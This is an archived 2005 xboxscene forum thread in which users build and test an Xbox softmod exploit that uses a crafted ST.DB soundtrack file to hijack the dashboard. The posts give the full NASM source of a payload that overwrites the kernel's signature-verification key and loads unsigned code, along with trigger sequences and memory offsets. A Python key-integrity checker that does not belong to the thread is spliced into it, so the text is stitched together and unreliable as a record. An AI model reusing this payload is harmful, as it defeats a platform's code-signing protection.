xboxscene.org forums

OG Xbox Forums => No-Modchip Hacks (exploits) => XBE Exploits => Topic started by: Ndure protagonist on September 23, 2005, 09:07:00 AM

Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 23, 2005, 09:07:00 AM
Ndure's fonts and retail Uber Double Dash setups seem to provide a unique Audio Exploit opportunity, that could enable a 'purely MS dash' way back to the softmod from the "full retail" (Live console compliant) dashboard!

On 5713 & 5838 kernels, that's currently only possible using SCEEE and MAEEE, which is far from ideal.  Additionally, UDDAE wouldn't suffer from reset-on-eject...

It requires a suitably exploited ST.DB file plus the xboxdash.xbe and six XIP* files from the UberDash (or SlaYers 2.5's 4920, the XBE via a patch**).

The ST.DB's the challenge... since UDDAE's triggered first by easter-egging the xboxdash.xbe (as settings_adoc.xip in the 5960 dash) then triggering the audio exploit (via the Uber4920 dash) the memory layout isn't what the existing ST.DB was coded for, I presume, as the Xbox reboots.

Anyone interested in attempting to get it working (maybe by re-coding rmenhal's hulkstdb.asm***) and/or have any questions/comments?


* default, keyboard, mainmenu5, music_copy3, music_playedit2 and music2 (place in xboxdashdata.17cdc100).

** http://forums.xbox-scene.com/index.php?act...dpost&p=2351379 (place in xboxdashdata.185ead00).

*** http://forums.xbox-scene.com/index.php?act...dpost&p=1849661 (HULK audio exploit; suitable baseline?)

Edit: This pertains to the Ndure fonts setup too...

This post has been edited by Ndure protagonist: Sep 23 2005, 04:15 PM
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Textbook on September 23, 2005, 09:14:00 AM
If this happens, which it probably will, will you have to change your name to UDDAE protagonist?  I don't know anything about the whole development side of anything, I just know how to use the softmods, but this sounds like great news as I was a fan of SCEEE and even wrote a tutorial on it.  Good luck with your next project, mr. UDDAE protagonist.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 23, 2005, 09:56:00 AM
Addendum:

Re. the xboxdash.xbe being placed in xboxdashdata.185ead00: it needs to be named as settings_adoc.xip in there.

Re. the .xip's being placed in xboxdashdata.17cdc100: there will consequently be two xboxdashdata.{version#} directories; my tests found this one isn't affected by dashupdate.xbe runs.


{: Textbook, in not so many words (tee-hee) it was previously introduced re. "UD-eh!" :}
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on September 23, 2005, 10:11:00 AM
I never did any audio things.. what's the button sequence for activating settings_adoc..
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on September 23, 2005, 10:20:00 AM
to trigger the easter egg (settings_adoc.xip):
QUOTE
This works best when you already have a soundtrack copied to your HD using the msdash.
Select music, the soundtrack you copied over, copy, copy, new soundtrack, and put in the following as name. This must be
exactly like this: <<Eggsßox>> ,Done (the <<>> are under symbols and the ß is under accents. Also note the capital E)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on September 24, 2005, 12:27:00 PM
QUOTE
since UDDAE's triggered first by easter-egging the xboxdash.xbe
(as settings_adoc.xip in the 5960 dash)

this xboxdash.xbe is from the uber4920 dash (17cdc100) ???
QUOTE
then triggering the audio exploit (via the Uber4920 dash)

how is it triggered ?
how many different types of exploited ST.DB are there ?

so what will happen:
5960 dash > st.db > (<<Eggsßox>>)  > uber4920  > trigger? > st.db > habibi signed code

the 5960 dash must also see this st.db as valid ?
at what point does it reboot ?
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 24, 2005, 06:45:00 PM
QUOTE
this xboxdash.xbe is from the uber4920 dash (17cdc100) ???
Yes (which can also be made from 1012a700's with the patch)

QUOTE
how is it triggered ?
how many different types of exploited ST.DB are there ?
The audio exploit is triggered by pressing the button sequence below.
I know of only two "types" of exploited ST.DB; the 4920 dash (I've tried catfish's) and the HULK movie disc (rmenhal's).

QUOTE
so what will happen:
5960 dash > st.db > (<<Eggsßox>>) > uber4920 > trigger? > st.db > habibi signed code
Yes (the st.db being in E:\TDATA\fffe0000\music and "trigger?" as below)

QUOTE
the 5960 dash must also see this st.db as valid ?
at what point does it reboot ?
It will (the 5960 dash's easter-egg doesn't validate the st.db).
With the st.db's I've tried, the reboot occurs as soon as you press the last button:
CODE
   A   (MUSIC)
   Down
   A   (blank)
   Down
   A   (COPY)
   Right
   Right
   A   (COPY)
   A   (NEW SOUNDTRACK)
   A   (DONE)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on September 25, 2005, 01:29:00 PM
what makes the code start running from address 0 in the "hulk" st.db
from looking at it, that is what happens....

if code is running the thing that is not known is where the kernel table is ?

if so do you think it is possible to search for the "XePublicKeyData" the MS Key
using: [address] that has 31415352h for data, and [address+10h] must have 10001h for data...(maybe 1st, 2nd, 3rd or last instance of it)
start search at 80000000h ? (the lowest address it could be)

then calculate all the other kernel table entries on the fly from there ?
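
The signature described in the post above (dword 31415352h with 10001h at +10h) is also what an analyst can use to locate the signature-verification key in a memory or flash dump and confirm it has not been altered. This is an added example, not code from the thread; the base address, hashed window length and sample image are constructed assumptions.

```python
import hashlib
import struct

# Values quoted in the post: the key blob starts with the dword 31415352h
# ('RSA1' in memory) and carries the dword 10001h at offset 10h.
RSA1_MAGIC = 0x31415352
PUBLIC_EXPONENT = 0x10001
EXPONENT_OFFSET = 0x10

# Constructed values for the sample below (assumptions, not from the thread).
SAMPLE_BASE = 0x80010000      # address the dump is assumed to start at
SAMPLE_WINDOW = 20 + 64       # bytes hashed per blob: header + sample modulus


def find_key_headers(image: bytes, base: int = 0) -> list:
    """Return the addresses of every blob matching both signature dwords."""
    needle = struct.pack("<I", RSA1_MAGIC)
    hits = []
    pos = image.find(needle)
    while pos != -1:
        exp_at = pos + EXPONENT_OFFSET
        # The magic alone is only four ASCII bytes, so require the exponent
        # dword as well before accepting the hit.
        if exp_at + 4 <= len(image):
            (exponent,) = struct.unpack_from("<I", image, exp_at)
            if exponent == PUBLIC_EXPONENT:
                hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits


def reference_digest(image: bytes, base: int, addr: int, window: int) -> str:
    """SHA-256 of `window` bytes starting at `addr`, taken from a trusted dump."""
    off = addr - base
    return hashlib.sha256(image[off:off + window]).hexdigest()


def check_key_integrity(image: bytes, base: int, window: int,
                        known_good_sha256: str) -> list:
    """Compare each located key blob against a known-good digest.

    Returns (address, status) pairs where status is "match", "MODIFIED",
    or "truncated" when the dump ends before the full window is available.
    """
    results = []
    for addr in find_key_headers(image, base):
        off = addr - base
        blob = image[off:off + window]
        if len(blob) < window:
            results.append((addr, "truncated"))
            continue
        digest = hashlib.sha256(blob).hexdigest()
        status = "match" if digest == known_good_sha256 else "MODIFIED"
        results.append((addr, status))
    return results


def build_sample_image(tampered: bool = False) -> bytes:
    """Constructed dump: padding, a decoy magic, then one key-shaped blob."""
    # Decoy: correct magic but the dword at +10h is not 10001h.
    decoy = struct.pack("<I", RSA1_MAGIC) + b"\xff" * 28
    # Header: magic, three filler dwords (zeroed here), exponent at +10h.
    header = struct.pack("<IIIII", RSA1_MAGIC, 0, 0, 0, PUBLIC_EXPONENT)
    modulus = bytes(range(64))            # constructed stand-in for key bytes
    image = bytearray(b"\x00" * 0x40 + decoy + b"\x00" * 0x20
                      + header + modulus + b"\x00" * 0x40)
    if tampered:
        # Flip one bit inside the key bytes; the header stays intact, so the
        # blob is still found but no longer hashes to the reference value.
        image[0x80 + len(header) + 10] ^= 0x01
    return bytes(image)


if __name__ == "__main__":
    clean = build_sample_image()
    key_addr = find_key_headers(clean, SAMPLE_BASE)[0]
    good = reference_digest(clean, SAMPLE_BASE, key_addr, SAMPLE_WINDOW)
    for label, img in (("clean", clean),
                       ("tampered", build_sample_image(tampered=True))):
        for addr, status in check_key_integrity(img, SAMPLE_BASE,
                                                SAMPLE_WINDOW, good):
            print(f"{label}: key blob at {addr:#010x}: {status}")
```
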
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 25, 2005, 07:44:00 PM
xman954, to be honest I have hardly any understanding of that ... wish I did!

I don't even know whether a 4920 dash audio exploit source might be a better baseline (than HULK's)?

It sure would be great if a generic ST.DB (which I think you're suggesting) is a possibility for Ndure though.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dus on September 26, 2005, 01:09:00 AM
QUOTE(xman954 @ Sep 25 2005, 09:40 PM)
what makes the code start running from address 0 in the "hulk" st.db
from looking at it, that is what happens....


It doesn't start at 0. The three dd:s (HEAD012) are actually very important...
I don't know much, but I believe they are used to corrupt the stack when st.db is read.

Good luck!
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 26, 2005, 08:37:00 AM
QUOTE(Ndure protagonist @ Sep 25 2005, 02:56 AM)
It will (the 5960 dash's easter-egg doesn't validate the st.db).

A quote from rmenhal:
QUOTE(rmenhal @ May 24 2004, 04:51 AM)
You forgot that audio exploits don't work with post-4920 dashes
:(

This post has been edited by PedrosPad: Sep 26 2005, 04:01 PM
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 26, 2005, 09:01:00 AM
PedrosPad, your pre-edit info. was correct, which is why UDDAE needs 5960's easter-egg capability to launch the Uber4920's skeleton, which is then audio exploited...

(Hopefully this clarifies your post-edit too.)

This post has been edited by Ndure protagonist: Sep 26 2005, 04:03 PM
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 26, 2005, 09:06:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:12 PM)
PedrosPad, your pre-edit info. was correct, which is why UDDAE needs 5960's easter-egg capability to launch the Uber4920's skeleton, which is then audio exploited...

(Hopefully this clarifies your post-edit too.)

5960 dash > (<<Eggsßox>>) > Uber4920 > trigger > audio exploit(st.db) > habibi signed code.
(correction to post #7! -  :P )

This post has been edited by PedrosPad: Sep 26 2005, 04:18 PM
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 26, 2005, 09:07:00 AM
{: Yes, as per Post#7... :}
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: DaBiscuit on September 26, 2005, 09:19:00 AM
QUOTE(Ndure protagonist @ Sep 23 2005, 04:18 PM)
Ndure's fonts and retail Uber Double Dash setups seem to provide a unique Audio Exploit opportunity, that could enable a 'purely MS dash' way back to the softmod from the "full retail" (Live console compliant) dashboard!

Would you mind clarifying for me what exactly you wish to achieve? I don't entirely understand. NDURE allows a user to boot either a shadow C with retail MS dash, or a modded dash with a homebrew dash. Both work well, so what is it that this new exploit would add?

I'm not trying to be rude, I would like to understand.

This post has been edited by DaBiscuit: Sep 26 2005, 04:19 PM
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on September 26, 2005, 09:28:00 AM
The new "exploit" (it isn't a new exploit) would allow you to switch off/on the softmod completely without having an exploitable game. This would only have a use if you ever need to get to the LIVE! dash or networks settings.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 26, 2005, 09:58:00 AM
Actually it's only "necessarily" beneficial for returning from the Live console enabled MS dash (as the softmod can be used to change the network settings and deactivate Ndure) without using an exploitable game.

However, it's worth pursuing for that benefit alone because it's technically and legally(!) a better alternative than SCEEE and MAEEE...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: DaBiscuit on September 26, 2005, 10:06:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:09 PM)
Actually it's only "necessarily" beneficial for returning from the Live console enabled MS dash (as the softmod can be used to change the network settings and deactivate Ndure) without using an exploitable game.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 26, 2005, 10:20:00 AM
DaBiscuit, sounds like you're referring to the limitations audio exploits have had for the past couple of years.

If that's so, then this is unrelated (as the booted dashboard here is the 5960).
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 26, 2005, 11:14:00 AM
QUOTE(DaBiscuit @ Sep 26 2005, 05:30 PM)
...NDURE allows a user to boot either a shadow C with retail MS dash, or a modded dash with a homebrew dash...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on September 26, 2005, 11:39:00 AM
QUOTE(DaBiscuit @ Sep 26 2005, 12:17 PM)
that if a new dash comes out, they can be utterly useless, unless you avoid updates.

that's only if they fix the <<eggsBox>> thing (validate setting_adoc.xip) but with xbox360 on its way will they still do updates
QUOTE
It doesn't start at 0. The three dd:s (HEAD012) are actually very important...
i see that now it starts at 0Ch

we know where it is (in mem) when it is booted it's normal way (hulk xboxdash.xbe)
but now it is loaded from dash 5960 using the <<eggsBox>> thing

so we just need to find what the address is where 5960 loads setting_adoc.xip
then just add that offset from 80000000h to the hulk st.db ??????

maybe using a hacked MS bios that only patches the MS key then run a "habibi signed test" setting_adoc.xip to get it's starting addr (writes it to a file) ???

of course it would be easier to have a X86 emulator with a J-tag interface
or some fancy monitor code to do "trace" and set break points
(can the XDK do this)


Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: DaBiscuit on September 26, 2005, 11:45:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:31 PM)
DaBiscuit, sounds like you're referring to the limitations audio exploits have had for the past couple of years.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 27, 2005, 12:57:00 AM
ndure exploit depends on the xodash.xbe (XBL dash, what's booted via live tab) for the exploit. this way, you have a font exploitable XBE that doesn't look for fonts in the fonts folder or root. thus, you can boot the M$dash without a virtual C (can have retail fonts in place) BUT the live tab won't work... cause it's font exploited. so to use the live dash, you need to remove the ndure exploit. just have a look at your real C.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 27, 2005, 02:47:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 06:09 PM)
Actually it's only "necessarily" beneficial for returning from the Live console enabled MS dash (as the softmod can be used to change the network settings and deactivate Ndure) without using an exploitable game.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 27, 2005, 08:55:00 AM
The quote in the post above you contains the answer...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 27, 2005, 09:06:00 AM
PedrosPad, I hope I'm not seeming to be "ripping off" your (or anyone's) ideas or previous work, that's certainly not my nature.  I have attempted to transfer knowledge and (much more challengingly) increase the level of understanding of how things work, such as via the green link in my sig!

I think I've added value regarding the "deployment aspect" of softmodding too (as 'eh.').  In addition to what you described (re. Ndure) as realising what the sum of the parts equaled, I also take pride in recognising that 17cdc100's xboxdashdata directory could co-exist with 185ead00's (and therefore be utilised for the audio exploit via the easter-egg).

I published that latter info. here in February and no one picked up on it.  Now seemed the right time to, since folks with uber-skills were active (like xman954, dr_oldschool and dus) and their recent work may have rekindled the enthusiasm in some others, to help us get a little closer to your vision...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 27, 2005, 09:19:00 AM
QUOTE(Ndure protagonist @ Sep 27 2005, 05:17 PM)
PedrosPad, I hope I'm not seeming to be "ripping off" your (or anyone's) ideas or previous work,
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 28, 2005, 12:36:00 AM
QUOTE(xman954 @ Sep 26 2005, 12:50 PM)
i see that now it starts at 0Ch
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 28, 2005, 04:33:00 AM
sad.gif).
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 28, 2005, 08:27:00 AM
QUOTE(xman954 @ Sep 26 2005, 07:50 PM)
we know where it is (in mem) when it is booted it's normal way (hulk xboxdash.xbe)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 29, 2005, 09:10:00 AM
PedrosPad, do you mean porting the HULK audio exploit's code to run with it (17cdc100) under normal boot conditions first?

{: I confirmed on my 3944 a long time ago that, as expected, a 4920 audio exploit works with it that way. :}
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 02, 2005, 05:39:00 PM
some good news
i have a working ST.DB for cold boot > uber4020 dash > st.db > habibi
(using a NDURE C:\ along side it)
that is based on the "doublestdb" by rmenhal
the one that uses "BUFF" instead of "RIFF" as HEAD0 (the one that cleans up the music dir)

so now we just need to find the offset of 5960 dash from <<EggsBox>>
i will try to do a xbe (settings_adoc.xip) that just writes this offset to a file

here it is in case someone wants to work on this.
CODE
;;;
;;; Compile: nasm -o ST.DB stdb.asm
;;;

  BITS 32

stdbmemofs   equ 1498BCh      ; < fixed by 4920 dash

D5960_offset    equ 00000000h  ; what is it ?  <<<<<<

mem_offset   equ 0D004B694h + D5960_offset     ; address when launched from 4920 only

bin_start:

.HEAD0  dd 'BUFF'
.HEAD1  dd (mem_offset-1498C8h)/4
.HEAD2  dd .start-.HEAD0+stdbmemofs

;;;
;;; Summary:
;;;   1) Remove the subdirectory 1498c8 (HEAD2) that Dashboard created.
;;;   2) Rewrite ST.DB to disk (because Dashboard gobbles it.)
;;;   3) Change the MS public key in kernel to habibi-key.
;;;   4) Load and run a habibi-signed XBE.
;;;

.start:
   call   .base
.base:   pop   ebp
   jmp   short .continuecode
;----------------
.xbestring   db 'default.xbe',0

.trnumstr   db 'T:\music\1498c8',0
.trnum  dw $-.trnumstr-1, $-.trnumstr-1
.ptrnumstr   dd .trnumstr-.HEAD0+stdbmemofs
.tmusicstdb   dw 14, 14
  dd 17E10h; "T:\MUSIC\ST.DB"
.dispose   db 1
;----------------
.continuecode:   

;   jmp   short $   ; make it hang <<<<<<<<<<<<<<<<

   dec   dword [ebp+.HEAD1-.base]
   dec   dword [ebp+.HEAD2-.base]
   push   dword [ebp+.HEAD0-.base-4]
   call   dword [12034h]; NtClose

   push   byte 26
   pop   ecx
   xor   eax,eax
   mov   edi,stdbmemofs+416
   rep   stosd
   inc   eax
   stosd
   mov   dword [edi-12],21371h

   push   eax
   mov   ebx,esp   ; File handle

   push   eax
   push   eax
   mov   esi,esp   ; IO status

   lea   eax,[ebp+.trnum-.base]
   push   byte 40h
   push   eax
   push   byte -3
   mov   edi,esp   ; Object attributes

   push   byte 1
   push   byte 4
   push   esi
  push   edi
   push   dword 10000h
   push   ebx
   call   dword [12040h]; NtOpenFile

   push   byte 13   ; 13 = FileDispositionInformation
   push   byte 1
   lea   eax,[ebp+.dispose-.base]
   push   eax
   push   esi
   push   dword [ebx]
   call   dword [120A0h]; NtSetInformationFile

   push   dword [ebx]
   call   dword [12034h]; NtClose


   lea   eax,[ebp+.tmusicstdb-.base]
   mov   [edi+4],eax

   push   byte 22h
   push   byte 3
   push   esi
  push   edi
   push   dword 40100000h
   push   ebx
   call   dword [12040h]; NtOpenFile

   mov   eax,512+12
   lea   edx,[ebp+.HEAD0-.base]
   call   .write

   push   byte 101
   pop   ecx
   mov   eax,512-12
.wl:   push   ecx
   mov   edx,10D70h; zeroes at 0x10D70
   call   .write
   mov   eax,512
   pop   ecx
   loop   .wl
   
   push   dword [ebx]
   mov   esi,dword [12034h]; NtClose
   call   esi

;  add   esp,byte 12+8+4
   

.patchpublickey:   
   mov   ebx,dword [121A8h]; XePublicKeyData
   test   ebx,ebx
   jz   short .badexport
   cmp   dword [ebx],31415352h
   jne   short .badexport
   cmp   dword [ebx+10h],10001h
   je   short .keyfound

.badexport:

   and   si,0F000h
.findkernel:
   mov   ax,[esi]
   cmp   ax,'ZM'
   je   short .check
   cmp   ax,'MZ'
   je   short .check
.retry:   sub   esi,1000h
   jmp   short .findkernel
.check:
   mov   eax,[esi+3Ch]
   cmp   eax,0FFFh
   ja   short .retry
   cmp   dword [esi+eax],'PE'
   jne   short .retry

   mov   ebx,esi
.searchkey:   
   inc   ebx
   cmp   dword [ebx],31415352h
   jne   short .searchkey
   cmp   dword [ebx+10h],10001h
   jne   short .searchkey
.keyfound:

.searchkeyend:   
   inc   ebx
   cmp   dword [ebx],0A44B1BBDh
   jne   short .searchkeyend

   cli
   mov   ecx,cr0
   push   ecx
   and   ecx,0FFFEFFFFh
   mov   cr0,ecx

   xor   dword [ebx],2DD78BD6h

   pop   ecx
   mov   cr0,ecx
   sti

.loadrunxbe:   
   push   byte 0
   push   esp
   push   byte 0
   push   byte 2
   push   127C8h   ; "\Device\Harddisk0\partition1"
   lea   eax,[ebp+.xbestring-.base]
   push   eax

   mov   esi,555A9h
   call   esi
.inf:   jmp   short .inf
;------------------------
.write:
   xor   ecx,ecx
   push   ecx
   push   eax
   push   edx
   push   esi
   push   ecx
   push   ecx
   push   ecx
   push   dword [ebx]
   call   dword [120D8h]; NtWriteFile
   ret
;
%if $-.HEAD0 > 416
   %error 416 bytes maximum!
%endif

   times 512-$+.HEAD0 db 0

   dd 21371h, 0, 1   ; An empty no-name track (for HD to HD copy)

   times 52224-$+bin_start.HEAD0 db 0


Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 02, 2005, 09:57:00 PM
Well done yet again xman954!

I've confirmed it works on my 3944; hopefully someone can test it on 5713/5838...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 04, 2005, 03:26:00 AM
QUOTE(xman954 @ Oct 3 2005, 01:50 AM)
some good news
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 04, 2005, 07:25:00 PM
Alright, I've been out of the scene for a while but was going to try this on my ntsc 5838 box.  I'm still pretty confused but this is what I've been able to put together (can't someone just put everything in one post instead of making us jump post to post, lol)

using kingroaches ndure 2.1 i should have:

C\

Audio/
bios/
Fonts/
media/
shadowc/
xboxdashdata.17cdc100/ (with only? Default.xip, keyboard.xip, mainmenu5.xip,                music_copy3.xip, music_playedit2.xip and music2.xip)
xboxdashdata.185ead00/ (with 4817 xboxdash.xbe renamed settings_adoc.xip)
xodash/ (with s1974272->s1994752 patched update.xbe)
msxboxdash.xbe
xboxdash.xbe
default.xip (from dash 4817)
mainmenu5.xip (from dash 4817)
bert.xtf and ernie.xtf (from here http://forums.xbox-s...post&p=1387970)

and

E\

Dash\
TDATA/fffe0000/music/ (with xman954’s st.db)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 04, 2005, 08:36:00 PM
{: dumdasme, that's similar to the setup I have on mine! :}

If you haven't yet, delete the 21 MB filler from shadowc (Ndure 2.1 preallocates that for easter-egging).

The 4817 stuff (incl. the bert and ernie in /C) won't work on a 5838, so delete those too.

The update.xbe in xodash should be the original one (the 185EAD00 version).
.
.
.
This test needs the Uber4920 xboxdash.xbe in C (the MS signed 17CDC100 version).

Also, copy /C/bios/bios.xbe to /E/default.xbe (as that's the habibi signed file this test's st.db launches).

If I haven't missed anything your Xbox should boot, look like "normal" (but only the Music tab will work) and the 10 button presses ("code" segment earlier in this thread) will hopefully trigger the audio exploit on your 5838...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 04, 2005, 10:44:00 PM
need some help here
QUOTE
Cold boot->D:5960->"<<EggsBox>>"->ProbeEnabledUberDash
= REBOOT and no file write...(modchip ON, OFF = "not a xbox disk")
could someone test this out also...

what i did find is, if you run a probe xbe that has a kernel thunk
table in it, all the "normal X86" reg are the same value no matter how it
booted, DVD or eggsbox or evox, i must be missing something.
is it something to do with the CPU "protected mode" ?
i can add code to the probe to find what we need, but i just don't know what to do  blink.gif
then write it to a file (that part works good)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 05, 2005, 01:57:00 AM
QUOTE(xman954 @ Oct 5 2005, 06:55 AM)
need some help here
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 05, 2005, 08:29:00 PM
Worked perfect on my ntsc 5838 using the generic fonts.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 05, 2005, 09:41:00 PM
Sorry for the double post, but it wouldn't let me edit.  I also tested this on an ntsc 4920 with generic fonts and it works.  If anyone is interested in my final file setup look here
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 05, 2005, 11:37:00 PM
@dundasme

AFAIK, this bit is wrong:
msxboxdash.xbe (uber4920 [.17cdc100] one) needs to be the 185ead00 xboxdash.xbe
and
xboxdashdata.185ead00/
should note: 17cdc100 xboxdash.xbe as settings_adoc.xip


And i was wondering how i should save this PPF since i keep getting "this is not a valid ppf file" errors..
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 06, 2005, 06:49:00 AM
QUOTE(Cio @ Oct 6 2005, 07:48 AM)
@dundasme
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 06, 2005, 11:55:00 AM
QUOTE(PedrosPad @ Oct 5 2005, 04:08 AM)
Obviously try
Cold boot->D:5960->"<<EggsBox>>"->UberDash
works first! - in order to verify that all the UberDash support files are in place.  wink.gif
that was the first thing i did and that works fine
QUOTE
After injecting probe.bin into the UberDash, re-sign the ProbeEnabledUberDash with xbedump - as this recalcs the XBE section checksums!  If you haven't already, it would be a good idea to rename the 'output file' from "bert.xtf", as we don't actually want this mistakenly read as a font at this point. smile.gif
did that too, data.dat...
also with bert.xtf and ernie.xtf in the root of C:\ (even though they're not used by NDURE)

i think the problem is:
the way it was intended to be booted was from the XBL tab of a newer
dash (not 5960) then you would do the audio hack using the doubleST.DB
that would, on it's first pass
CODE
;;;   1) Remove the subdirectory 1498c8 (HEAD2) that Dashboard created.
;;;   2) Read a replacement hack from the end of ST.DB and write it to the
;;;    beginning.
;;;   3) Change the MS public key in kernel to habibi-key.
;;;   4) Return to Dashboard. <<<<<<<<<<
then the Return to Dashboard would then trigger the probe in the 4920 dash...
but the (double)st.db still works coldboot>ProbeEnabledUberDash just no file write

as of yet, no file write...
can someone try to get it to write a file (any setup) ?

Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 06, 2005, 04:17:00 PM
QUOTE
Sorry for the double post, but it wouldn't let me edit. I also tested this on an ntsc 4920 with generic fonts and it works. If anyone is interested in my final file setup look here

oops, I meant my ntsc 3944.

@cio- On the 5838 i can't use the settings_adoc.xip xbe because that has been fixed in this kernel.  So instead, on both xboxes, i used the st.db to trigger the default.xbe in E\.

I'm not sure if how i have it setup i can access my live console or not, i don't use live so i can't really test it.  Since I have the dualboot setup, can i access the live console or do i need to boot straight into the uber4920 dash's xboxdash.xbe?
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 06, 2005, 10:28:00 PM
QUOTE(dumdasme @ Oct 7 2005, 12:28 AM)
oops, I meant my ntsc 3944.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 07, 2005, 01:10:00 AM
QUOTE(kingroach @ Oct 6 2005, 03:00 PM)
use a mime encoder..
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 07, 2005, 02:24:00 AM
QUOTE(Cio @ Oct 7 2005, 09:21 AM)
Could you elaborate just a little further...
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 07, 2005, 02:32:00 AM
I never did do 5 and 6, thx! (that explains a lot)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 07, 2005, 11:57:00 AM
disregard my last post, it seems i've gotten a little mixed up in a couple of areas.  I misread something that said the st.db got fixed in the latest dashboards and somehow twisted that into my previous post.

so if i understand this right, this means how i have it setup is basically no different from the regular ndure setup. I was trying to figure out how my setup would give you live console access whereas the regular ndure setup wouldn't. So basically what I need is 5960 xboxdash.xbe-> <<Eggsbox>> -> uberdash4920 -> st.db.

So at this point, it is basically not possible to dualboot and maintain full live console access?

At least I can say that you can successfully use the st.db with the 5838 kernel which was the original reason for me posting.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 08, 2005, 10:13:00 AM
dumdasme, thanks for confirming xman954's new version of the 4920 audio exploit works with the UberDash on a 5838!  (Although expecting it would, technically, it's great to know for certain that it really does.)

If you have enough space left, you could add the 'settings3' and 'settings_panel' XIP's (just for shits'n'giggles) to enable its [Settings]->[System Info.] ... hardly anyone has ever seen it display K:5838 and D:4920 before.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 08, 2005, 02:40:00 PM
STILL trying to find the offset but no luck so far,
did a stack dump (112 bytes) from coldboot and eggsbox boot
there are a few differences..

does anyone know of an app or xbe that will show FREE memory that will coldboot??
and anyone care to guess how large the offset would be ??  smile.gif
(ie: 10KB <offset < 50KB )

Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 08, 2005, 05:35:00 PM
I'm totally confused now.  I adjusted my setup, so now i load the 5960 dash, easter egg to load the 4920 dash, but then when i try to do the st.db, then it reboots the xbox back to the 5960 dash.  But if I start out loading straight to the 4920 dash or do the ndure dualboot to the 4920 dash then I can do the st.db trick fine.  

Any ideas of why this is happening?
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 08, 2005, 08:19:00 PM
in my 5101 xbox I am having another problem.. I modified the st.db slightly ( just edited the path /partition1\bios\).. first time I enter EEE, it returns me back to msdash.. then at msdash when I enter ee again, it just reboots the xbox..
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: globe_guyx on October 09, 2005, 11:14:00 AM
Yippeee  rmenhal!!!!  Together with xman954 the possibilities are endless
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 09, 2005, 11:40:00 AM
WOW that was it !!!
CODE
D5960_offset    equ 00001B000h    ; eggsBox
mem_offset   equ 0D004B694h - D5960_offset  ; address when launched from 5960>EggsBox>4920

and ST.DB (udstdb) works fine with 4034 too..... beerchug.gif

for some reason i was stuck thinking the offset would be plus
but know it would be small  sad.gif

NP (eh..) will be happy too  smile.gif
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 09, 2005, 12:58:00 PM
Whoohah. Rmenhal in tha hizouse. Nice to see your name across the screen with again some outstanding info.
Title: Wanted... "rmenhal-like" Skills For Development Of
